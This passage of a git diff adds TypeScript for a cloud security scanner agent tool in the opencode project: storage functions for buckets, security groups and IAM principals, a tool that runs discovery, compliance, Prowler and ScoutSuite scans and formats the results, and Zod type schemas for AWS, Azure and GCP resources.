+          log.warn("Failed to parse bucket file", { key })
+        }
+      }
+    }
+
+    // Apply filters
+    if (filters?.provider) {
+      buckets = buckets.filter((b) => b.provider === filters.provider)
+    }
+    if (filters?.isPublic !== undefined) {
+      buckets = buckets.filter((b) => !b.publicAccessBlocked === filters.isPublic)
+    }
+
+    // Apply limit
+    if (filters?.limit) {
+      buckets = buckets.slice(0, filters.limit)
+    }
+
+    return buckets
+  }
+
+  // ========== Security Groups ==========
+
+  /**
+   * Save a security group.
+   */
+  export async function saveSecurityGroup(
+    sg: CloudScanTypes.SecurityGroup,
+    config: StorageConfig = {}
+  ): Promise<CloudScanTypes.SecurityGroup> {
+    const validated = CloudScanTypes.SecurityGroup.parse(sg)
+
+    if (config.storage === "memory") {
+      const existingIdx = securityGroupBuffer.findIndex((s) => s.id === validated.id)
+      if (existingIdx >= 0) {
+        securityGroupBuffer[existingIdx] = validated
+      } else {
+        securityGroupBuffer.push(validated)
+      }
+    } else {
+      await Storage.write(["pentest", "cloudscan", "security-groups", validated.id], validated)
+    }
+
+    log.debug("Security group saved", {
+      id: validated.id,
+      name: validated.name,
+      hasPublicIngress: validated.hasPublicIngress,
+    })
+    return validated
+  }
+
+  /**
+   * List security groups with filters.
+   */
+  export async function listSecurityGroups(
+    config: StorageConfig = {},
+    filters?: {
+      provider?: CloudScanTypes.CloudProvider
+      hasPublicIngress?: boolean
+      limit?: number
+    }
+  ): Promise<CloudScanTypes.SecurityGroup[]> {
+    let sgs: CloudScanTypes.SecurityGroup[]
+
+    if (config.storage === "memory") {
+      sgs = [...securityGroupBuffer]
+    } else {
+      const keys = await Storage.list(["pentest", "cloudscan", "security-groups"])
+      sgs = []
+      for (const key of keys) {
+        try {
+          const data = await Storage.read<CloudScanTypes.SecurityGroup>(key)
+          sgs.push(CloudScanTypes.SecurityGroup.parse(data))
+        } catch {
+          log.warn("Failed to parse security group file", { key })
+        }
+      }
+    }
+
+    // Apply filters
+    if (filters?.provider) {
+      sgs = sgs.filter((s) => s.provider === filters.provider)
+    }
+    if (filters?.hasPublicIngress !== undefined) {
+      sgs = sgs.filter((s) => s.hasPublicIngress === filters.hasPublicIngress)
+    }
+
+    // Apply limit
+    if (filters?.limit) {
+      sgs = sgs.slice(0, filters.limit)
+    }
+
+    return sgs
+  }
+
+  // ========== IAM Principals ==========
+
+  /**
+   * Save an IAM principal.
+   */
+  export async function savePrincipal(
+    principal: CloudScanTypes.IAMPrincipal,
+    config: StorageConfig = {}
+  ): Promise<CloudScanTypes.IAMPrincipal> {
+    const validated = CloudScanTypes.IAMPrincipal.parse(principal)
+
+    if (config.storage === "memory") {
+      const existingIdx = principalBuffer.findIndex((p) => p.id === validated.id)
+      if (existingIdx >= 0) {
+        principalBuffer[existingIdx] = validated
+      } else {
+        principalBuffer.push(validated)
+      }
+    } else {
+      await Storage.write(["pentest", "cloudscan", "principals", validated.id], validated)
+    }
+
+    log.debug("Principal saved", {
+      id: validated.id,
+      name: validated.name,
+      type: validated.type,
+    })
+    return validated
+  }
+
+  /**
+   * List IAM principals with filters.
+   */
+  export async function listPrincipals(
+    config: StorageConfig = {},
+    filters?: {
+      provider?: CloudScanTypes.CloudProvider
+      type?: CloudScanTypes.PrincipalType
+      mfaEnabled?: boolean
+      limit?: number
+    }
+  ): Promise<CloudScanTypes.IAMPrincipal[]> {
+    let principals: CloudScanTypes.IAMPrincipal[]
+
+    if (config.storage === "memory") {
+      principals = [...principalBuffer]
+    } else {
+      const keys = await Storage.list(["pentest", "cloudscan", "principals"])
+      principals = []
+      for (const key of keys) {
+        try {
+          const data = await Storage.read<CloudScanTypes.IAMPrincipal>(key)
+          principals.push(CloudScanTypes.IAMPrincipal.parse(data))
+        } catch {
+          log.warn("Failed to parse principal file", { key })
+        }
+      }
+    }
+
+    // Apply filters
+    if (filters?.provider) {
+      principals = principals.filter((p) => p.provider === filters.provider)
+    }
+    if (filters?.type) {
+      principals = principals.filter((p) => p.type === filters.type)
+    }
+    if (filters?.mfaEnabled !== undefined) {
+      principals = principals.filter((p) => p.mfaEnabled === filters.mfaEnabled)
+    }
+
+    // Apply limit
+    if (filters?.limit) {
+      principals = principals.slice(0, filters.limit)
+    }
+
+    return principals
+  }
+
+  // ========== Memory Management ==========
+
+  /**
+   * Clear memory buffers (testing).
+   */
+  export function clearMemory(): void {
+    scanBuffer.length = 0
+    findingBuffer.length = 0
+    resourceBuffer.length = 0
+    bucketBuffer.length = 0
+    securityGroupBuffer.length = 0
+    principalBuffer.length = 0
+  }
+
+  /**
+   * Get memory counts (testing).
+   */
+  export function memoryCount(): {
+    scans: number
+    findings: number
+    resources: number
+    buckets: number
+    securityGroups: number
+    principals: number
+  } {
+    return {
+      scans: scanBuffer.length,
+      findings: findingBuffer.length,
+      resources: resourceBuffer.length,
+      buckets: bucketBuffer.length,
+      securityGroups: securityGroupBuffer.length,
+      principals: principalBuffer.length,
+    }
+  }
+}
diff --git a/packages/opencode/src/pentest/cloudscan/tool.ts b/packages/opencode/src/pentest/cloudscan/tool.ts
new file mode 100644
index 00000000000..c3ae85b0b2b
--- /dev/null
+++ b/packages/opencode/src/pentest/cloudscan/tool.ts
@@ -0,0 +1,652 @@
+/**
+ * @fileoverview Cloud Security Scanner Tool
+ *
+ * Agent tool for cloud security scanning operations.
+ *
+ * @module pentest/cloudscan/tool
+ */
+
+import { z } from "zod"
+import { Tool } from "../../tool/tool"
+import { CloudScanTypes } from "./types"
+import { CloudScanProfiles } from "./profiles"
+import { CloudScanOrchestrator } from "./orchestrator"
+import type { CloudScanResult } from "./orchestrator"
+import { CloudDiscovery } from "./discovery"
+import { ComplianceChecker } from "./compliance"
+import { Log } from "../../util/log"
+
+const log = Log.create({ service: "cloudscan.tool" })
+
+/**
+ * Cloud scan tool actions.
+ */
+const CloudScanAction = z.enum([
+  "discover",
+  "scan",
+  "quick-scan",
+  "full-scan",
+  "iam-scan",
+  "storage-scan",
+  "network-scan",
+  "compliance",
+  "prowler",
+  "scoutsuite",
+  "status",
+  "profiles",
+  "prerequisites",
+  "regions",
+])
+
+type CloudScanAction = z.infer<typeof CloudScanAction>
+
+/**
+ * Cloud scan tool parameters.
+ */
+const CloudScanParams = z.object({
+  action: CloudScanAction,
+  provider: CloudScanTypes.CloudProvider.optional(),
+  profile: z.string().optional(),
+  regions: z.array(z.string()).optional(),
+  resourceTypes: z.array(CloudScanTypes.ResourceType).optional(),
+  frameworks: z.array(CloudScanTypes.ComplianceFramework).optional(),
+  scanId: z.string().optional(),
+  // Provider options
+  awsProfile: z.string().optional(),
+  azureSubscription: z.string().optional(),
+  gcpProject: z.string().optional(),
+  timeout: z.number().optional(),
+})
+
+type CloudScanParams = z.infer<typeof CloudScanParams>
+
+/**
+ * CloudScanTool - Agent tool for cloud security scanning.
+ */
+export const CloudScanTool = Tool.define(
+  "cloudscan",
+  {
+    description: `Cloud security scanner for AWS, Azure, and GCP.
+
+Actions:
+- discover: Enumerate cloud resources
+- scan: Run security scan with profile
+- quick-scan: Fast assessment
+- full-scan: Comprehensive scan with external tools
+- iam-scan: IAM/RBAC focused scan
+- storage-scan: Storage bucket focused scan
+- network-scan: Security group focused scan
+- compliance: Compliance framework check
+- prowler: Run Prowler tool (AWS)
+- scoutsuite: Run ScoutSuite tool
+- status: Get scan status
+- profiles: List available profiles
+- prerequisites: Check CLI tools and auth
+- regions: List available regions
+
+Examples:
+  cloudscan discover provider=aws regions=["us-east-1"]
+  cloudscan scan provider=aws profile=standard
+  cloudscan quick-scan provider=azure azureSubscription=sub-id
+  cloudscan iam-scan provider=gcp gcpProject=my-project
+  cloudscan compliance provider=aws frameworks=["cis","pci-dss"]
+  cloudscan prowler provider=aws awsProfile=prod
+  cloudscan prerequisites provider=aws
+  cloudscan profiles`,
+
+    parameters: CloudScanParams,
+
+    async execute(params: CloudScanParams, ctx) {
+      log.info("CloudScanTool executing", { action: params.action })
+
+      let output: string
+      try {
+        switch (params.action) {
+          case "discover":
+            output = await handleDiscover(params)
+            break
+          case "scan":
+            output = await handleScan(params)
+            break
+          case "quick-scan":
+            output = await handleQuickScan(params)
+            break
+          case "full-scan":
+            output = await handleFullScan(params)
+            break
+          case "iam-scan":
+            output = await handleIAMScan(params)
+            break
+          case "storage-scan":
+            output = await handleStorageScan(params)
+            break
+          case "network-scan":
+            output = await handleNetworkScan(params)
+            break
+          case "compliance":
+            output = await handleCompliance(params)
+            break
+          case "prowler":
+            output = await handleProwler(params)
+            break
+          case "scoutsuite":
+            output = await handleScoutSuite(params)
+            break
+          case "status":
+            output = handleStatus(params)
+            break
+          case "profiles":
+            output = handleProfiles()
+            break
+          case "prerequisites":
+            output = await handlePrerequisites(params)
+            break
+          case "regions":
+            output = await handleRegions(params)
+            break
+          default:
+            output = `Unknown action: ${params.action}`
+        }
+      } catch (err) {
+        log.error("CloudScanTool error", { action: params.action, error: String(err) })
+        output = `Error: ${String(err)}`
+      }
+
+      return {
+        title: `cloudscan ${params.action}`,
+        output,
+        metadata: {},
+      }
+    },
+  }
+)
+
+// ========== Action Handlers ==========
+
+async function handleDiscover(params: CloudScanParams): Promise<string> {
+  if (!params.provider) {
+    return "Error: provider is required (aws, azure, gcp)"
+  }
+
+  const result = await CloudDiscovery.discover(`discover_${Date.now()}`, {
+    provider: params.provider,
+    regions: params.regions,
+    resourceTypes: params.resourceTypes,
+    timeout: params.timeout,
+    awsProfile: params.awsProfile,
+    azureSubscription: params.azureSubscription,
+    gcpProject: params.gcpProject,
+  })
+
+  return formatDiscoveryResult(result)
+}
+
+async function handleScan(params: CloudScanParams): Promise<string> {
+  if (!params.provider) {
+    return "Error: provider is required (aws, azure, gcp)"
+  }
+
+  const result = await CloudScanOrchestrator.scan({
+    provider: params.provider,
+    profile: params.profile || "standard",
+    regions: params.regions,
+    resourceTypes: params.resourceTypes,
+    complianceFrameworks: params.frameworks,
+    timeout: params.timeout,
+    awsProfile: params.awsProfile,
+    azureSubscription: params.azureSubscription,
+    gcpProject: params.gcpProject,
+  })
+
+  return formatScanResult(result)
+}
+
+async function handleQuickScan(params: CloudScanParams): Promise<string> {
+  if (!params.provider) {
+    return "Error: provider is required (aws, azure, gcp)"
+  }
+
+  const result = await CloudScanOrchestrator.quickScan({
+    provider: params.provider,
+    regions: params.regions,
+    timeout: params.timeout,
+    awsProfile: params.awsProfile,
+    azureSubscription: params.azureSubscription,
+    gcpProject: params.gcpProject,
+  })
+
+  return formatScanResult(result)
+}
+
+async function handleFullScan(params: CloudScanParams): Promise<string> {
+  if (!params.provider) {
+    return "Error: provider is required (aws, azure, gcp)"
+  }
+
+  const result = await CloudScanOrchestrator.thoroughScan({
+    provider: params.provider,
+    regions: params.regions,
+    timeout: params.timeout,
+    awsProfile: params.awsProfile,
+    azureSubscription: params.azureSubscription,
+    gcpProject: params.gcpProject,
+    useProwler: true,
+    useScoutSuite: true,
+  })
+
+  return formatScanResult(result)
+}
+
+async function handleIAMScan(params: CloudScanParams): Promise<string> {
+  if (!params.provider) {
+    return "Error: provider is required (aws, azure, gcp)"
+  }
+
+  const result = await CloudScanOrchestrator.iamScan({
+    provider: params.provider,
+    regions: params.regions,
+    timeout: params.timeout,
+    awsProfile: params.awsProfile,
+    azureSubscription: params.azureSubscription,
+    gcpProject: params.gcpProject,
+  })
+
+  return formatScanResult(result)
+}
+
+async function handleStorageScan(params: CloudScanParams): Promise<string> {
+  if (!params.provider) {
+    return "Error: provider is required (aws, azure, gcp)"
+  }
+
+  const result = await CloudScanOrchestrator.storageScan({
+    provider: params.provider,
+    regions: params.regions,
+    timeout: params.timeout,
+    awsProfile: params.awsProfile,
+    azureSubscription: params.azureSubscription,
+    gcpProject: params.gcpProject,
+  })
+
+  return formatScanResult(result)
+}
+
+async function handleNetworkScan(params: CloudScanParams): Promise<string> {
+  if (!params.provider) {
+    return "Error: provider is required (aws, azure, gcp)"
+  }
+
+  const result = await CloudScanOrchestrator.networkScan({
+    provider: params.provider,
+    regions: params.regions,
+    timeout: params.timeout,
+    awsProfile: params.awsProfile,
+    azureSubscription: params.azureSubscription,
+    gcpProject: params.gcpProject,
+  })
+
+  return formatScanResult(result)
+}
+
+async function handleCompliance(params: CloudScanParams): Promise<string> {
+  if (!params.provider) {
+    return "Error: provider is required (aws, azure, gcp)"
+  }
+
+  const frameworks = params.frameworks || ["cis"]
+
+  const result = await CloudScanOrchestrator.complianceScan({
+    provider: params.provider,
+    frameworks: frameworks as CloudScanTypes.ComplianceFramework[],
+    regions: params.regions,
+    timeout: params.timeout,
+    awsProfile: params.awsProfile,
+    azureSubscription: params.azureSubscription,
+    gcpProject: params.gcpProject,
+  })
+
+  return formatComplianceResult(result)
+}
+
+async function handleProwler(params: CloudScanParams): Promise<string> {
+  if (!params.provider) {
+    return "Error: provider is required (aws, azure, gcp)"
+  }
+
+  const result = await CloudScanOrchestrator.scan({
+    provider: params.provider,
+    profile: "quick",
+    regions: params.regions,
+    timeout: params.timeout || 600000,
+    awsProfile: params.awsProfile,
+    azureSubscription: params.azureSubscription,
+    gcpProject: params.gcpProject,
+    useProwler: true,
+    useScoutSuite: false,
+  })
+
+  if (result.externalTools.prowler) {
+    const prowler = result.externalTools.prowler
+    let output = `# Prowler Results\n\n`
+    output += `Findings: ${prowler.findings.length}\n\n`
+
+    if (prowler.errors.length > 0) {
+      output += `## Errors\n${prowler.errors.join("\n")}\n\n`
+    }
+
+    const bySeverity: Record<string, number> = {}
+    for (const f of prowler.findings) {
+      bySeverity[f.severity] = (bySeverity[f.severity] || 0) + 1
+    }
+
+    output += `## By Severity\n`
+    for (const [sev, count] of Object.entries(bySeverity)) {
+      output += `- ${sev}: ${count}\n`
+    }
+
+    return output
+  }
+
+  return "Prowler did not produce results"
+}
+
+async function handleScoutSuite(params: CloudScanParams): Promise<string> {
+  if (!params.provider) {
+    return "Error: provider is required (aws, azure, gcp)"
+  }
+
+  const result = await CloudScanOrchestrator.scan({
+    provider: params.provider,
+    profile: "quick",
+    regions: params.regions,
+    timeout: params.timeout || 600000,
+    awsProfile: params.awsProfile,
+    azureSubscription: params.azureSubscription,
+    gcpProject: params.gcpProject,
+    useProwler: false,
+    useScoutSuite: true,
+  })
+
+  if (result.externalTools.scoutsuite) {
+    const scout = result.externalTools.scoutsuite
+    let output = `# ScoutSuite Results\n\n`
+    output += `Findings: ${scout.findings.length}\n\n`
+
+    if (scout.errors.length > 0) {
+      output += `## Errors\n${scout.errors.join("\n")}\n\n`
+    }
+
+    const bySeverity: Record<string, number> = {}
+    for (const f of scout.findings) {
+      bySeverity[f.severity] = (bySeverity[f.severity] || 0) + 1
+    }
+
+    output += `## By Severity\n`
+    for (const [sev, count] of Object.entries(bySeverity)) {
+      output += `- ${sev}: ${count}\n`
+    }
+
+    return output
+  }
+
+  return "ScoutSuite did not produce results"
+}
+
+function handleStatus(params: CloudScanParams): string {
+  if (params.scanId) {
+    const scan = CloudScanOrchestrator.getStatus(params.scanId)
+    if (scan) {
+      return formatScanResult(scan)
+    }
+    return `Scan not found: ${params.scanId}`
+  }
+
+  const running = CloudScanOrchestrator.getRunningScans()
+  if (running.length === 0) {
+    return "No scans currently running"
+  }
+
+  let output = `# Running Scans\n\n`
+  for (const scan of running) {
+    output += `- ${scan.id}: ${scan.provider} (${scan.status})\n`
+    output += `  Profile: ${scan.profile}\n`
+    output += `  Started: ${new Date(scan.startTime).toISOString()}\n`
+  }
+
+  return output
+}
+
+function handleProfiles(): string {
+  const profiles = CloudScanProfiles.list()
+
+  let output = `# Cloud Scan Profiles\n\n`
+
+  for (const profile of profiles) {
+    output += `## ${profile.name} (${profile.id})\n`
+    output += `${profile.description}\n\n`
+    output += `- Phases: ${profile.phases.join(", ")}\n`
+    output += `- Timeout: ${profile.timeout / 1000}s\n`
+    if (profile.resourceTypes) {
+      output += `- Resource Types: ${profile.resourceTypes.join(", ")}\n`
+    }
+    if (profile.complianceFrameworks) {
+      output += `- Compliance: ${profile.complianceFrameworks.join(", ")}\n`
+    }
+    if (profile.externalTools) {
+      const tools: string[] = []
+      if (profile.externalTools.prowler) tools.push("prowler")
+      if (profile.externalTools.scoutsuite) tools.push("scoutsuite")
+      if (tools.length > 0) {
+        output += `- External Tools: ${tools.join(", ")}\n`
+      }
+    }
+    output += `\n`
+  }
+
+  return output
+}
+
+async function handlePrerequisites(params: CloudScanParams): Promise<string> {
+  if (!params.provider) {
+    return "Error: provider is required (aws, azure, gcp)"
+  }
+
+  const result = await CloudDiscovery.checkPrerequisites(params.provider)
+
+  let output = `# Prerequisites Check: ${params.provider.toUpperCase()}\n\n`
+  output += `- CLI Installed: ${result.cliInstalled ? "Yes" : "No"}\n`
+  output += `- Authenticated: ${result.authenticated ? "Yes" : "No"}\n`
+  output += `- Available: ${result.available ? "Yes" : "No"}\n`
+
+  if (result.errors.length > 0) {
+    output += `\n## Issues\n`
+    for (const error of result.errors) {
+      output += `- ${error}\n`
+    }
+  }
+
+  return output
+}
+
+async function handleRegions(params: CloudScanParams): Promise<string> {
+  if (!params.provider) {
+    return "Error: provider is required (aws, azure, gcp)"
+  }
+
+  const regions = await CloudDiscovery.getRegions(params.provider)
+
+  let output = `# Available Regions: ${params.provider.toUpperCase()}\n\n`
+  for (const region of regions) {
+    output += `- ${region}\n`
+  }
+
+  return output
+}
+
+// ========== Formatters ==========
+
+function formatDiscoveryResult(result: import("./discovery").DiscoveryResult): string {
+  let output = `# Cloud Discovery Results\n\n`
+  output += `Provider: ${result.provider}\n`
+  output += `Regions: ${result.regions.join(", ") || "all"}\n\n`
+
+  output += `## Summary\n`
+  output += `Total Resources: ${result.summary.totalResources}\n\n`
+
+  output += `### By Type\n`
+  for (const [type, count] of Object.entries(result.summary.byType)) {
+    if (count > 0) {
+      output += `- ${type}: ${count}\n`
+    }
+  }
+
+  output += `\n### Resources\n`
+
+  if (result.resources.iam.users.length > 0) {
+    output += `\n#### IAM Users/Service Accounts (${result.resources.iam.users.length})\n`
+    for (const user of result.resources.iam.users.slice(0, 10)) {
+      output += `- ${user.name}\n`
+    }
+    if (result.resources.iam.users.length > 10) {
+      output += `  ... and ${result.resources.iam.users.length - 10} more\n`
+    }
+  }
+
+  if (result.resources.storage.length > 0) {
+    output += `\n#### Storage Buckets (${result.resources.storage.length})\n`
+    for (const bucket of result.resources.storage.slice(0, 10)) {
+      output += `- ${bucket.name}\n`
+    }
+    if (result.resources.storage.length > 10) {
+      output += `  ... and ${result.resources.storage.length - 10} more\n`
+    }
+  }
+
+  if (result.resources.network.securityGroups.length > 0) {
+    output += `\n#### Security Groups (${result.resources.network.securityGroups.length})\n`
+    for (const sg of result.resources.network.securityGroups.slice(0, 10)) {
+      output += `- ${sg.name}\n`
+    }
+    if (result.resources.network.securityGroups.length > 10) {
+      output += `  ... and ${result.resources.network.securityGroups.length - 10} more\n`
+    }
+  }
+
+  if (result.resources.compute.instances.length > 0) {
+    output += `\n#### Compute Instances (${result.resources.compute.instances.length})\n`
+    for (const instance of result.resources.compute.instances.slice(0, 10)) {
+      output += `- ${instance.name} (${instance.state})\n`
+    }
+    if (result.resources.compute.instances.length > 10) {
+      output += `  ... and ${result.resources.compute.instances.length - 10} more\n`
+    }
+  }
+
+  if (result.errors.length > 0) {
+    output += `\n## Errors\n`
+    for (const error of result.errors) {
+      output += `- ${error}\n`
+    }
+  }
+
+  return output
+}
+
+function formatScanResult(result: CloudScanResult): string {
+  let output = `# Cloud Security Scan Results\n\n`
+  output += `Scan ID: ${result.id}\n`
+  output += `Provider: ${result.provider}\n`
+  output += `Profile: ${result.profile}\n`
+  output += `Status: ${result.status}\n`
+  output += `Duration: ${result.endTime ? Math.round((result.endTime - result.startTime) / 1000) : "running"}s\n\n`
+
+  output += `## Summary\n`
+  output += `Total Resources: ${result.summary.totalResources}\n`
+  output += `Total Findings: ${result.summary.totalFindings}\n\n`
+
+  output += `### Findings by Severity\n`
+  output += `- Critical: ${result.summary.bySeverity.critical}\n`
+  output += `- High: ${result.summary.bySeverity.high}\n`
+  output += `- Medium: ${result.summary.bySeverity.medium}\n`
+  output += `- Low: ${result.summary.bySeverity.low}\n`
+  output += `- Info: ${result.summary.bySeverity.info}\n\n`
+
+  if (Object.keys(result.summary.byCategory).length > 0) {
+    output += `### Findings by Category\n`
+    for (const [category, count] of Object.entries(result.summary.byCategory)) {
+      output += `- ${category}: ${count}\n`
+    }
+    output += `\n`
+  }
+
+  // Show critical and high findings
+  const criticalHighFindings = result.findings.filter(
+    (f) => f.severity === "critical" || f.severity === "high"
+  )
+
+  if (criticalHighFindings.length > 0) {
+    output += `## Critical & High Findings\n\n`
+    for (const finding of criticalHighFindings.slice(0, 20)) {
+      output += `### [${finding.severity.toUpperCase()}] ${finding.title}\n`
+      output += `${finding.description}\n`
+      output += `- Resource: ${finding.resourceType} (${finding.resourceId})\n`
+      output += `- Category: ${finding.category}\n\n`
+    }
+    if (criticalHighFindings.length > 20) {
+      output += `... and ${criticalHighFindings.length - 20} more critical/high findings\n\n`
+    }
+  }
+
+  if (result.errors.length > 0) {
+    output += `## Errors\n`
+    for (const error of result.errors) {
+      output += `- ${error}\n`
+    }
+  }
+
+  return output
+}
+
+function formatComplianceResult(result: CloudScanResult): string {
+  let output = `# Compliance Scan Results\n\n`
+  output += `Provider: ${result.provider}\n\n`
+
+  for (const compliance of result.compliance) {
+    const info = ComplianceChecker.getFrameworkInfo(compliance.framework)
+
+    output += `## ${info.name} (${compliance.version})\n\n`
+    output += `### Summary\n`
+    output += `- Total Checks: ${compliance.summary.total}\n`
+    output += `- Passed: ${compliance.summary.passed}\n`
+    output += `- Failed: ${compliance.summary.failed}\n`
+    output += `- Pass Rate: ${compliance.summary.passRate}%\n\n`
+
+    if (compliance.summary.failed > 0) {
+      output += `### Failed Checks\n\n`
+      const failedChecks = compliance.checks.filter((c) => c.status === "failed")
+
+      for (const check of failedChecks.slice(0, 15)) {
+        output += `#### [${check.severity.toUpperCase()}] ${check.controlTitle}\n`
+        output += `${check.description}\n`
+        if (check.remediation) {
+          output += `Remediation: ${check.remediation}\n`
+        }
+        output += `\n`
+      }
+
+      if (failedChecks.length > 15) {
+        output += `... and ${failedChecks.length - 15} more failed checks\n\n`
+      }
+    }
+
+    output += `### By Category\n`
+    for (const [category, counts] of Object.entries(compliance.byCategory)) {
+      const total = counts.passed + counts.failed
+      const rate = total > 0 ? Math.round((counts.passed / total) * 100) : 0
+      output += `- ${category}: ${counts.passed}/${total} (${rate}%)\n`
+    }
+    output += `\n`
+  }
+
+  return output
+}
diff --git a/packages/opencode/src/pentest/cloudscan/types.ts b/packages/opencode/src/pentest/cloudscan/types.ts
new file mode 100644
index 00000000000..7affa19d351
--- /dev/null
+++ b/packages/opencode/src/pentest/cloudscan/types.ts
@@ -0,0 +1,963 @@
+/**
+ * @fileoverview Cloud Security Scanner Types
+ *
+ * Zod schemas and TypeScript types for cloud infrastructure
+ * security testing including AWS, Azure, and GCP.
+ *
+ * @module pentest/cloudscan/types
+ */
+
+import z from "zod"
+
+/**
+ * Cloud scan types namespace.
+ */
+export namespace CloudScanTypes {
+  // ============================================
+  // Enums and Literals
+  // ============================================
+
+  /**
+   * Supported cloud providers.
+   */
+  export const CloudProvider = z.enum(["aws", "azure", "gcp"])
+  export type CloudProvider = z.infer<typeof CloudProvider>
+
+  /**
+   * Scan status values.
+   */
+  export const Status = z.enum(["pending", "running", "completed", "failed", "stopped"])
+  export type Status = z.infer<typeof Status>
+
+  /**
+   * Scan profile IDs.
+   */
+  export const ProfileId = z.enum([
+    "discovery",
+    "quick",
+    "standard",
+    "thorough",
+    "compliance",
+    "iam-focused",
+    "storage-focused",
+    "network-focused",
+    "custom",
+  ])
+  export type ProfileId = z.infer<typeof ProfileId>
+
+  /**
+   * Compliance frameworks.
+   */
+  export const ComplianceFramework = z.enum([
+    "cis",
+    "nist",
+    "pci-dss",
+    "hipaa",
+    "soc2",
+    "gdpr",
+    "iso27001",
+    "aws-well-architected",
+    "aws-foundational-security",
+    "azure-security-benchmark",
+    "gcp-security-foundations",
+  ])
+  export type ComplianceFramework = z.infer<typeof ComplianceFramework>
+
+  /**
+   * Finding severity levels.
+   */
+  export const Severity = z.enum(["critical", "high", "medium", "low", "info"])
+  export type Severity = z.infer<typeof Severity>
+
+  /**
+   * Resource types.
+   */
+  export const ResourceType = z.enum([
+    // Common
+    "user",
+    "group",
+    "role",
+    "policy",
+    "service-account",
+    // Compute
+    "vm",
+    "instance",
+    "container",
+    "function",
+    // Storage
+    "bucket",
+    "blob",
+    "object",
+    "disk",
+    // Network
+    "vpc",
+    "subnet",
+    "security-group",
+    "firewall-rule",
+    "load-balancer",
+    // Database
+    "database",
+    "db-instance",
+    // Other
+    "key",
+    "secret",
+    "certificate",
+    "log-group",
+    "other",
+  ])
+  export type ResourceType = z.infer<typeof ResourceType>
+
+  /**
+   * IAM principal types.
+   */
+  export const PrincipalType = z.enum([
+    "user",
+    "group",
+    "role",
+    "service-account",
+    "federated",
+    "anonymous",
+    "root",
+  ])
+  export type PrincipalType = z.infer<typeof PrincipalType>
+
+  /**
+   * Storage access levels.
+   */
+  export const AccessLevel = z.enum(["private", "authenticated", "public-read", "public-write"])
+  export type AccessLevel = z.infer<typeof AccessLevel>
+
+  // ============================================
+  // Credential Types
+  // ============================================
+
+  /**
+   * AWS credentials.
+   */
+  export const AWSCredentials = z.object({
+    accessKeyId: z.string().optional(),
+    secretAccessKey: z.string().optional(),
+    sessionToken: z.string().optional(),
+    region: z.string().default("us-east-1"),
+    profile: z.string().optional(),
+    roleArn: z.string().optional(),
+  })
+  export type AWSCredentials = z.infer<typeof AWSCredentials>
+
+  /**
+   * Azure credentials.
+   */
+  export const AzureCredentials = z.object({
+    subscriptionId: z.string().optional(),
+    tenantId: z.string().optional(),
+    clientId: z.string().optional(),
+    clientSecret: z.string().optional(),
+    resourceGroup: z.string().optional(),
+    useMsi: z.boolean().default(false),
+  })
+  export type AzureCredentials = z.infer<typeof AzureCredentials>
+
+  /**
+   * GCP credentials.
+   */
+  export const GCPCredentials = z.object({
+    projectId: z.string().optional(),
+    keyFile: z.string().optional(),
+    serviceAccount: z.string().optional(),
+    impersonateServiceAccount: z.string().optional(),
+  })
+  export type GCPCredentials = z.infer<typeof GCPCredentials>
+
+  /**
+   * Cloud credentials union.
+   */
+  export const CloudCredentials = z.discriminatedUnion("provider", [
+    z.object({ provider: z.literal("aws"), ...AWSCredentials.shape }),
+    z.object({ provider: z.literal("azure"), ...AzureCredentials.shape }),
+    z.object({ provider: z.literal("gcp"), ...GCPCredentials.shape }),
+  ])
+  export type CloudCredentials = z.infer<typeof CloudCredentials>
+
+  // ============================================
+  // Resource Types
+  // ============================================
+
+  /**
+   * Cloud resource tag.
+   */
+  export const ResourceTag = z.object({
+    key: z.string(),
+    value: z.string(),
+  })
+  export type ResourceTag = z.infer<typeof ResourceTag>
+
+  /**
+   * Generic cloud resource.
+   */
+  export const CloudResource = z.object({
+    id: z.string(),
+    arn: z.string().optional(),
+    name: z.string(),
+    type: ResourceType,
+    provider: CloudProvider,
+    region: z.string().optional(),
+    account: z.string().optional(),
+    tags: z.array(ResourceTag).default([]),
+    createdAt: z.number().optional(),
+    metadata: z.record(z.string(), z.unknown()).default({}),
+  })
+  export type CloudResource = z.infer<typeof CloudResource>
+
+  // ============================================
+  // IAM Types
+  // ============================================
+
+  /**
+   * IAM permission.
+   */
+  export const IAMPermission = z.object({
+    action: z.string(),
+    resource: z.string(),
+    effect: z.enum(["allow", "deny"]),
+    condition: z.record(z.string(), z.unknown()).optional(),
+  })
+  export type IAMPermission = z.infer<typeof IAMPermission>
+
+  /**
+   * IAM policy statement.
+   */
+  export const IAMPolicyStatement = z.object({
+    sid: z.string().optional(),
+    effect: z.enum(["Allow", "Deny"]),
+    actions: z.array(z.string()),
+    resources: z.array(z.string()),
+    principals: z.array(z.string()).optional(),
+    conditions: z.record(z.string(), z.record(z.string(), z.unknown())).optional(),
+  })
+  export type IAMPolicyStatement = z.infer<typeof IAMPolicyStatement>
+
+  /**
+   * IAM policy.
+   */
+  export const IAMPolicy = z.object({
+    id: z.string(),
+    arn: z.string().optional(),
+    name: z.string(),
+    provider: CloudProvider,
+    type: z.enum(["managed", "inline", "customer", "aws-managed"]),
+    statements: z.array(IAMPolicyStatement).default([]),
+    attachedTo: z.array(z.string()).default([]),
+    createdAt: z.number().optional(),
+    updatedAt: z.number().optional(),
+    isOverlyPermissive: z.boolean().default(false),
+    issues: z.array(z.string()).default([]),
+  })
+  export type IAMPolicy = z.infer<typeof IAMPolicy>
+
+  /**
+   * IAM principal (user, role, service account).
+   */
+  export const IAMPrincipal = z.object({
+    id: z.string(),
+    arn: z.string().optional(),
+    name: z.string(),
+    provider: CloudProvider,
+    type: PrincipalType,
+    email: z.string().optional(),
+    createdAt: z.number().optional(),
+    lastUsed: z.number().optional(),
+    passwordLastUsed: z.number().optional(),
+    mfaEnabled: z.boolean().default(false),
+    accessKeys: z.array(z.object({
+      id: z.string(),
+      status: z.enum(["active", "inactive"]),
+      createdAt: z.number().optional(),
+      lastUsed: z.number().optional(),
+    })).default([]),
+    inlinePolicies: z.array(z.string()).default([]),
+    attachedPolicies: z.array(z.string()).default([]),
+    groups: z.array(z.string()).default([]),
+    roles: z.array(z.string()).default([]),
+    permissions: z.array(IAMPermission).default([]),
+    issues: z.array(z.string()).default([]),
+  })
+  export type IAMPrincipal = z.infer<typeof IAMPrincipal>
+
+  /**
+   * IAM group.
+   */
+  export const IAMGroup = z.object({
+    id: z.string(),
+    arn: z.string().optional(),
+    name: z.string(),
+    provider: CloudProvider,
+    members: z.array(z.string()).default([]),
+    inlinePolicies: z.array(z.string()).default([]),
+    attachedPolicies: z.array(z.string()).default([]),
+    createdAt: z.number().optional(),
